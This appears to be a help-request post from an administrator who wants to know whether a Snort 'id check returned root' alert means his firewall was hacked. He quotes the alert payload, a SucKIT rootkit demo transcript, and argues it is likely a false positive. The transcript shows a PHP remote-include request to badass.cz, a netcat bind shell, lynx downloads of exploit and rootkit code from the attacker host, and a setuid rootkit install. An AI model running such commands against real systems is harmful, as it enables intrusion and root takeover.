I came in this moring and checked my snort alerts (morning routine), and noticed the following:<br>
<br>
ATTACK-RESPONSES id check returned root
2005-10-21
07:40:32
<a href="http://82.165.25.125:80">82.165.25.125:80</a>
<a href="http://10.10.10.5:51949">10.10.10.5:51949</a>
TCP<br>
<br>
Some background. 10.10.10.x is my dmz and <a href="http://10.10.10.5">10.10.10.5</a> is a
firewall/proxy (Slack 10.1) that connects the 10.10.10.x to our
192.168.0.x internal network.<br>
So I started digging around. The alert logged the following:<br>
<br>
SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit *.* <br>
(c)oded by <a href="mailto:sd@sf.cz">sd@sf.cz</a> &amp; <a href="mailto:devik@cdi.cz">devik@cdi.cz</a>, 2001 <br>
Configuring ./sk:.OK!.[<a href="mailto:attacker@badass.cz">attacker@badass.cz</a> ~/sk10]$ telnet <a href="http://lamehost.com">lamehost.com</a>
80.Trying 192.160.0.2.... Connected to lamehost.com..Escape character
is '^]'..GET /bighole.php3?inc=<a href="http://badass.cz/egg.php3">http://badass.cz/egg.php3</a> HTTP/1.1.Host:
<a href="http://lamehost.com">lamehost.com</a> ..HTTP/1.1 200 OK.Date: Thu, 18 Oct 2001 04:04:52
GMT.Server: Apache/1.3.14 (Unix) (Red-Hat/Linux)
PHP/4.0.4pl1.Last-Modified: Fri, 28 Sep 2001 04:42:34 <a href="http://GMT.ET">GMT.ET</a> ag:
&quot;31c6-c2-3bb3ffba&quot;.Content-Type: text/html..IT WERKS!
Shell at port 8193 Connection closed by foreign
host..[attacker@badass.cz~/sk10]$ nc -v <a href="http://lamehost.com">lamehost.com</a> <a href="http://8193.lamehost.com">8193.lamehost.com</a>
[<a href="http://192.168.0.2">192.168.0.2</a>] 8193 (?) open.w.12:08am up 1:20, 3
users, load average: 0.05, 0.06,0.08.USER
TTY FROM
LOGIN@IDLE JCPU PCPU AT.root
tty1 - 11:58pm 39:03
3.15s 2.95s <a href="http://bash.cd">bash.cd</a> /tmp.lynx -dump <a href="http://badass.cz/s.c&gt">http://badass.cz/s.c
&gt</a>; s.c.gcc s.c o
super-duper-hacker-user-rooter../super-duper-hacker-user-rooter.id.uid=0(root)
gid=0(root) groups=0(root).cd /usr/local/man/man4.mkdir .l33t.cd
.l33t.lynx -dump <a href="http://badass.cz/~attacker/sk10/s">http://badass.cz/~attacker/sk10/s</a><br>
k &gt; sk.chmod+s+u sk../sk.* * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * *.*SUCKIT v1.1c - New, singing, dancing, w<br>
<br>
Ok, there a few things that make me think that this is a false
positive. First is the "<a href="http://192.160.0.02">192.160.0.02</a>" IP. That is not on
this network. Second, There is no host on <a href="http://192.168.0.2">192.168.0.2</a>.
Third, I do not have any Red Hat machines. They are all
Slackware. I am still concerned. I searched for "sk" and
all I found are two directories related to vim and I didn't find a
directory called "l33t".<br>
<br>
Can anyone me verify that I wasn't hacked?<br>
<br>
Thanks,<br>
Chris<br>